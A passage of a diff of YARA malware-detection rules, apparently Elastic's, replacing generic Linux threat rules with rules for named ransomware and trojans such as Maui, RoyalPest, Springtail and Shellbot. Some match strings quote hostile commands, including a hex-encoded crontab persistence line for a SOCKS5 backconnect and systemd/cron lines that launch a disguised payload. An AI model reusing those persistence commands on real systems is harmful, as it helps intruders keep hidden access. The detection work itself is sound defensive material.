MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Ransomware Maui (Windows.Ransomware.Maui)" author = "Elastic Security" - id = "887671e9-1e93-42d9-afb8-a96d1a87c572" - date = "2024-02-01" - modified = "2024-02-13" + id = "266dea64-2ed2-4bfc-977b-5ddb68ab05ac" + date = "2022-07-08" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L490-L508" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "701c7c75ed6a7aaf59f5a1f04192a1f7d49d73c1bd36453aed703ad5560606dc" - logic_hash = "eefe9391a9ce716dbe16f11b8ccea89d032fdad42fcabd84ffe584409c550847" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Maui.yar#L1-L29" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e" + logic_hash = "2094920615b6297adb222003d25a8d0934a89f24869e7e70644a4956021c7afc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "55cbfbd761e2000492059909199d16faf6839d3d893e29987b73087942c9de78" - severity = 50 + fingerprint = "6f6451b7a972924b2efe339b8793c30409123df37d3d64802037a5af8cb4b5f3" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 55 89 E5 57 56 53 83 E4 F0 83 EC 40 8B 45 0C E8 DC 04 00 00 81 C3 AC F7 0B 00 89 44 24 04 8B 45 08 89 04 24 E8 A7 67 00 00 85 C0 0F 88 40 04 00 00 C7 04 24 00 00 00 00 E8 03 F5 FF FF 8B 93 34 } + $a1 = "Please append it by using -maui option." wide fullword + $a2 = "Please overwrite it by using -maui option." wide fullword + $a3 = "maui.log" wide fullword + $a4 = "maui.key" wide fullword + $a5 = "maui.evd" wide fullword + $a6 = "Encrypt[%s]: %s" wide fullword + $a7 = "PROCESS_GOINGON[%d%% / %d%%]: %s" wide fullword + $a8 = "PROCESS_REPLACECONFIRM: %s" wide fullword + $seq_encrypt_priv_key = { 55 8B 6C 24 ?? 57 8B F9 85 DB 74 ?? 85 FF 74 ?? 85 ED 74 ?? 56 8D 87 ?? ?? ?? ?? 50 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 51 ?? 6A ?? 52 8B F0 56 53 57 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 7F ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5F 83 C8 ?? 5D C3 } + $seq_get_private_key = { 57 8B F8 85 FF 75 ?? 5F C3 56 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 7F ?? ?? 8B F0 74 ?? 8B 07 50 56 E8 ?? ?? ?? ?? EB ?? 8B 0F 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 75 ?? 5E 33 C0 5F C3 } + $seq_get_pub_key = { B9 F4 FF FF FF 2B 4C 24 ?? 6A 02 51 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 07 53 6A ?? 52 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 32 DB 8B C7 E8 ?? ?? ?? ?? 89 46 28 8B 0F 51 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 5F 8B C6 5E 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 } condition: - all of them + 5 of ($a*) or 2 of ($seq*) } -rule ELASTIC_Linux_Generic_Threat_9Cf10F10 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ladvix_Db41F9D2 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" author = "Elastic Security" - id = "9cf10f10-9a5b-46b5-ae25-7239b8f1434a" - date = "2024-02-01" - modified = "2024-02-13" + id = "db41f9d2-aa5c-4d26-b8ba-cece44eddca8" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L510-L528" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d07c9be37dc37f43a54c8249fe887dbc4058708f238ff3d95ed21f874cbb84e8" - logic_hash = "ca4ae64b73fb7013008e8049d17479032d904a3faf5ad0f2ad079971a231a3b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ladvix.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "81642b4ff1b6488098f019c5e992fc942916bc6eb593006cf91e878ac41509d6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "88b3122e747e685187a7b7268e22d12fbd16a24c7c2edb6f7e09c86327fc2f0e" - severity = 50 + fingerprint = "d0aaa680e81f44cc555bf7799d33fce66f172563788afb2ad0fb16d3e460e8c6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 14 8B 44 24 18 8B 08 89 0C 24 89 44 24 04 C6 44 24 08 00 E8 84 1E 00 00 8B 44 24 0C 89 44 24 10 8B 4C 24 18 8B 09 89 04 24 8B 54 24 1C 89 54 24 04 89 4C 24 08 E8 52 C7 05 00 8B 44 24 } + $a = { C0 49 89 C4 74 45 45 85 ED 7E 26 48 89 C3 41 8D 45 FF 4D 8D 7C } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_75813Ab2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ladvix_77D184Fd : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" author = "Elastic Security" - id = "75813ab2-47f5-40ad-b512-9aa081abdc03" - date = "2024-02-01" - modified = "2024-02-13" + id = "77d184fd-a15e-40e5-ac7e-0d914cc009fe" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L530-L549" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5819eb73254fd2a698eb71bd738cf3df7beb65e8fb5e866151e8135865e3fd9a" - logic_hash = "06e5daed278273137e416ef3ee6ac8496b144a9c3ce213ec92881ba61d7db6cb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ladvix.yar#L20-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1bb44b567b3c82f7ee0e08b16f7326d1af57efe77d608a96b2df43aab5faa9f7" + logic_hash = "0ae9c41d3eb7964344f71b9708278a0e83776228e4455cf0ad7c08e288305203" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e5b985f588cf6d1580b8e5dc85350fd0e1ca22ca810b1eca8d2bed774237c930" - severity = 50 + fingerprint = "21361ca7c26c98903626d1167747c6fd11a5ae0d6298d2ef86430ce5be0ecd1a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 5B 2B 5D 20 6D 6D 61 70 3A 20 30 78 25 6C 78 20 2E 2E 20 30 78 25 6C 78 } - $a2 = { 5B 2B 5D 20 70 61 67 65 3A 20 30 78 25 6C 78 } + $a = { 40 10 48 89 45 80 8B 85 64 FF FF FF 48 89 E2 48 89 D3 48 63 D0 48 83 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_11041685 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ladvix_C9888Edb : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" - author = "Elastic Security" - id = "11041685-8c0d-4de0-ba43-b8f676882857" - date = "2024-02-01" - modified = "2024-02-13" + description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" + author = "Elastic Security" + id = "c9888edb-0f82-4c7a-b501-4e4d3c9c64e3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L551-L570" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "296440107afb1c8c03e5efaf862f2e8cc6b5d2cf979f2c73ccac859d4b78865a" - logic_hash = "19f4109e73981424527ece8c375274f97fd3042427b7875071451a8081a9aae7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ladvix.yar#L40-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1d798e9f15645de89d73e2c9d142189d2eaf81f94ecf247876b0b865be081dca" + logic_hash = "608f2340b0ee4b843933d8137aa0908583a6de477e6c472fb4bd2e5bb62dfb80" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d446fd63eb9a036a722d76183866114ab0c11c245d1f47f8949b0241d5a79e40" - severity = 50 + fingerprint = "e0e0d75a6de7a11b2391f4a8610a6d7c385df64d43fa1741d7fe14b279e1a29a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 72 65 73 6F 6C 76 65 64 20 73 79 6D 62 6F 6C 20 25 73 20 74 6F 20 25 70 } - $a2 = { 73 79 6D 62 6F 6C 20 74 61 62 6C 65 20 6E 6F 74 20 61 76 61 69 6C 61 62 6C 65 2C 20 61 62 6F 72 74 69 6E 67 21 } + $a = { E8 01 83 45 E4 01 8B 45 E4 83 F8 57 76 B5 83 45 EC 01 8B 45 EC 48 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_0D22F19C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ladvix_81Fccd74 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" author = "Elastic Security" - id = "0d22f19c-5724-480b-95de-ef2609896c52" - date = "2024-02-01" - modified = "2024-02-13" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L572-L591" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "da5a204af600e73184455d44aa6e01d82be8b480aa787b28a1df88bb281eb4db" - logic_hash = "ee43796b0717717cb012385d5bb3aece433c11780f1a293d280c39411f9fed98" + id = "81fccd74-465d-4f2e-b879-987bc47828dd" + date = "2021-06-28" + modified = "2021-09-16" + reference = "2a183f613fca5ec30dfd82c9abf72ab88a2c57d2dd6f6483375913f81aa1c5af" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ladvix.yar#L60-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "18f7ca953d22f02c1dbf03595a19b66ea582d2c1623f0042dcf15f86556ca41e" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c1899febb7bf6717bc330577a4baae4b4e81d69c4b3660944a6d8f708652d230" - severity = 50 + fingerprint = "0e983107f38a6b2a739a44ab4d37c35c5a7d8217713b280a1786511089084a95" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 55 49 44 20 25 64 2C 20 45 55 49 44 3A 25 64 20 47 49 44 3A 25 64 2C 20 45 47 49 44 3A 25 64 } - $a2 = { 50 54 52 41 43 45 5F 50 4F 4B 45 55 53 45 52 20 66 61 75 6C 74 } + $a = { 45 EA 00 00 48 8D 45 EA 48 8B 55 F0 0F B6 12 88 10 0F B7 45 EA 0F } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_4A46B0E1 : FILE MEMORY +rule ELASTIC_Linux_Virus_Gmon_E544D891 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Virus Gmon (Linux.Virus.Gmon)" author = "Elastic Security" - id = "4a46b0e1-b0d4-423c-9600-f594d3a48a33" - date = "2024-02-01" - modified = "2024-02-13" + id = "e544d891-3f6d-4da2-be86-e4ab58c66465" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L593-L612" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ba47ba830ab8deebd9bb906ea45c7df1f7a281277b44d43c588c55c11eba34a" - logic_hash = "e3f6804f502fad8c893fb4c3c27506b6ef17d7e0d0a01399c6d185bad92e895a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Virus_Gmon.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d0fe377664aa0bc0d1fd3a307650f211dd3ef2e2f04597abee465e836e6a6f32" + logic_hash = "6dcfd51aaa79d7bac0100d9c891aa4275b8e1f7614cda46a5da4c738d376c729" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2ae70fc399a228284a3827137db2a5b65180811caa809288df44e5b484eb1966" - severity = 50 + fingerprint = "269f0777f846f9fc8fe56ea7436bddb155cde8c9a4bf9070f46db0081caef718" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 20 28 76 69 61 20 53 79 73 74 65 6D 2E 6D 61 70 29 } - $a2 = { 20 5B 2B 5D 20 52 65 73 6F 6C 76 65 64 20 25 73 20 74 6F 20 25 70 25 73 } + $a = { E5 53 51 52 8B 44 24 14 8B 5C 24 18 8B 4C 24 1C 8B 54 24 20 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_0A02156C : FILE MEMORY +rule ELASTIC_Linux_Virus_Gmon_192Bd9B3 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Virus Gmon (Linux.Virus.Gmon)" author = "Elastic Security" - id = "0a02156c-2958-44c5-9dbd-a70d528e507d" - date = "2024-02-01" - modified = "2024-02-13" + id = "192bd9b3-230a-4f07-b4f9-06213a6b6f47" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L614-L633" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f23d4b1fd10e3cdd5499a12f426e72cdf0a098617e6b178401441f249836371e" - logic_hash = "3ceea812f0252ec703a92482ce7a3ef0aa65bad149df2aa0107e07a45490b8f1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Virus_Gmon.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d0fe377664aa0bc0d1fd3a307650f211dd3ef2e2f04597abee465e836e6a6f32" + logic_hash = "3df275349d14a845c73087375f96e0c9a069ff685beb89249590ef9448e50373" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "aa7a34e72e03b70f2f73ae319e2cc9866fbf2eddd4e6a8a2835f9b7c400831cd" - severity = 50 + fingerprint = "532055052554ed9a38b16f764d3fbae0efd333f5b2254b9a1e3f6d656d77f1e4" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 72 65 71 75 69 72 65 73 5F 6E 75 6C 6C 5F 70 61 67 65 } - $a2 = { 67 65 74 5F 65 78 70 6C 6F 69 74 5F 73 74 61 74 65 5F 70 74 72 } + $a = { E5 56 53 8B 75 08 8B 5D 0C 8B 4D 10 31 D2 39 CA 7D 11 8A 04 1A 38 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_6D7Ec30A : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Royalpest_502A3Db6 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Ransomware Royalpest (Linux.Ransomware.RoyalPest)" author = "Elastic Security" - id = "6d7ec30a-5c9f-4d82-8191-b26eb2f40799" - date = "2024-02-21" - modified = "2024-06-12" + id = "502a3db6-4711-42c7-8178-c3150f184fc6" + date = "2023-07-27" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L635-L654" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1cad1ddad84cdd8788478c529ed4a5f25911fb98d0a6241dcf5f32b0cdfc3eb0" - logic_hash = "33c705b89a82989c25fc67f50b06aa3a613cae567ec652d86ae64bad4b253c28" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_RoyalPest.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "09a79e5e20fa4f5aae610c8ce3fe954029a91972b56c6576035ff7e0ec4c1d14" + logic_hash = "aefb5a286636b827b50e4bc0ea978a75ba6a9e572504bfbc0a7700372c54a077" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "7d547a73a44eab080dde9cd3ff87d75cf39d2ae71d84a3daaa6e6828e057f134" - severity = 50 + fingerprint = "4bde7998f41ef3d0f2769078cf56e03d36eacf503f859a23fc442ced95d839cb" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 2F 74 6D 70 2F 73 6F 63 6B 73 35 2E 73 68 } - $a2 = { 63 61 74 20 3C 28 65 63 68 6F 20 27 40 72 65 62 6F 6F 74 20 65 63 68 6F 20 73 6F 63 6B 73 35 5F 62 61 63 6B 63 6F 6E 6E 65 63 74 36 36 36 20 3E 20 2F 64 65 76 2F 6E 75 6C 6C 20 7C 20 28 63 64 20 20 26 26 20 29 27 29 20 3C 28 73 65 64 20 27 2F 73 6F 63 6B 73 35 5F 62 61 63 6B 63 6F 6E 6E 65 63 74 36 36 36 2F 64 27 20 3C 28 63 72 6F 6E 74 61 62 20 2D 6C 20 32 3E 2F 64 65 76 2F 6E 75 6C 6C 29 29 20 7C 20 63 72 6F 6E 74 61 62 20 2D } + $a1 = "hit by Royal ransomware." + $a2 = "Please contact us via :" + $a3 = ".onion/%s" + $a4 = "esxcli vm process list > list" condition: - all of them + 3 of them } -rule ELASTIC_Linux_Generic_Threat_900Ffdd4 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Crytox_29859242 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Ransomware Crytox (Windows.Ransomware.Crytox)" author = "Elastic Security" - id = "900ffdd4-085e-4d6b-af7b-2972157dcefd" - date = "2024-02-21" - modified = "2024-06-12" + id = "29859242-adf4-4d17-afdf-dbc02f5b787b" + date = "2024-01-18" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L656-L674" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a3e1a1f22f6d32931d3f72c35a5ee50092b5492b3874e9e6309d015d82bddc5d" - logic_hash = "eb69bfc146b32e790fffdf4588b583335d2006182070b53fec43bb6e4971d779" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Crytox.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "55a27cb6280f31c077987d338151b13e9dc0cc1c14d47a32e64de6d6c1a6a742" + logic_hash = "47ca96e14b2b56bc6ef1ed22b42adac7aa557170632c2dc085fae3baf6198f40" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f03d39e53b06dd896bfaff7c94beaa113df1831dc397ef0ea8bea63156316a1b" - severity = 50 + fingerprint = "999713c1815d61904f13f7f9cbaf34b116f53af223b2aac20bf0d88af107dbae" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 20 48 89 7D E8 89 75 E4 48 83 7D E8 00 74 5C C7 45 FC 00 00 00 00 EB 3D 8B 45 FC 48 98 48 C1 E0 04 48 89 C2 48 8B 45 E8 48 01 D0 48 8B 00 48 85 C0 74 1E 8B 45 FC 48 98 48 C1 E0 04 48 } + $a = { 48 83 C7 20 D7 C1 C8 08 D7 C1 C8 08 D7 C1 C8 08 D7 C1 C8 10 33 C2 33 47 E0 D0 E2 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Cb825102 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Springtail_35D5B90B : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Springtail (Linux.Trojan.Springtail)" author = "Elastic Security" - id = "cb825102-0b03-4885-9f73-44dd0cf2d45c" - date = "2024-02-21" + id = "35d5b90b-f81d-4a10-828b-8315f8e87ca7" + date = "2024-05-18" modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L676-L694" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4e24b72b24026e3dfbd65ddab9194bd03d09446f9ff0b3bcec76efbb5c096584" - logic_hash = "ac48f32ec82aac6df0697729d14aaee65fba82d91173332cd13c6ccccd63b1be" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Springtail.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "30584f13c0a9d0c86562c803de350432d5a0607a06b24481ad4d92cdf7288213" + logic_hash = "7158e60aedfde884d9ee01457abfe6d9b6b1df9cdc1c415231d98429866eaa6c" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e23ac81c245de350514c54f91e8171c8c4274d76c1679500d6d2b105f473bdfc" - severity = 50 - arch_context = "x86" + fingerprint = "ca2d3ea7b23c0fc21afb9cfd2d6561727780bda65d2db1a5780b627ac7b07e66" + severity = 100 + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 5B 2B 5D 20 72 65 73 6F 6C 76 69 6E 67 20 72 65 71 75 69 72 65 64 20 73 79 6D 62 6F 6C 73 2E 2E 2E } + $systemd1 = "Description=syslogd" + $systemd2 = "ExecStart=/bin/sh -c \"/var/log/syslogd\"" + $cron1 = "cron.txt@reboot" + $cron2 = "/bin/shcrontab" + $cron3 = "type/var/log/syslogdcrontab cron.txt" + $uri = "/mir/index.php" condition: all of them } -rule ELASTIC_Linux_Generic_Threat_3Bcc1630 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Shellbot_65Aa6568 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Shellbot (Linux.Trojan.Shellbot)" author = "Elastic Security" - id = "3bcc1630-cfa4-4f2e-b129-f0150595dbc3" - date = "2024-02-21" - modified = "2024-06-12" + id = "65aa6568-491a-4a51-b921-c6c228cfca11" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L696-L716" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "62a6866e924af2e2f5c8c1f5009ce64000acf700bb5351a47c7cfce6a4b2ffeb" - logic_hash = "6f602aac6db46ac3f5b7716a1dac53b5dbd2c583505644bfc617d69be0a2d4de" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Shellbot.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "457d1f4e1db41a9bdbfad78a6815f42e45da16ad0252673b9a2b5dcefc02c47b" + logic_hash = "46558801151ddc2f25bf46a278719f027acca2a18d2a9fcb275f4d787fbb1f0b" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "0e4fe564c5c3c04e4b40af2bebb091589fb52292bd16a78b733c67968fa166e7" - severity = 50 + fingerprint = "2cd606ecaf17322788a5ee3b6bd663bed376cef131e768bbf623c402664e9270" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 2F 72 6F 6F 74 2F 64 76 72 5F 67 75 69 2F } - $a2 = { 2F 72 6F 6F 74 2F 64 76 72 5F 61 70 70 2F } - $a3 = { 73 74 6D 5F 68 69 33 35 31 31 5F 64 76 72 } + $a = { 72 00 73 74 72 63 6D 70 00 70 61 6D 5F 70 72 6F 6D 70 74 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_5D5Fd28E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Subsevux_E9E80C1E : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Subsevux (Linux.Trojan.Subsevux)" author = "Elastic Security" - id = "5d5fd28e-ae8f-4b6f-ad95-57725550fcef" - date = "2024-02-21" - modified = "2024-06-12" + id = "e9e80c1e-c064-47cf-91f2-0561dd5c9bcd" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L718-L738" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b179a117e946ce639e99ff42ab70616ed9f3953ff90b131b4b3063f970fa955" - logic_hash = "b29ca34b98ee87151496f900fa3558190127957539afac3fd99db2dc51980213" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Subsevux.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a4ccd399ea99d4e31fbf2bbf8017c5368d29e630dc2985e90f07c10c980fa084" + logic_hash = "8bc38f26da5a3350cbae3e93b890220bb461ff77e83993a842f68db8f757e435" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "3a24edfbafc0abee418998d3a6355f4aa2659d68e27db502149a34266076ed15" - severity = 50 + fingerprint = "bbd7a2d80e545d0cae7705a53600f6b729918a3d655bc86b2db83f15d4e550e3" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 2F 75 73 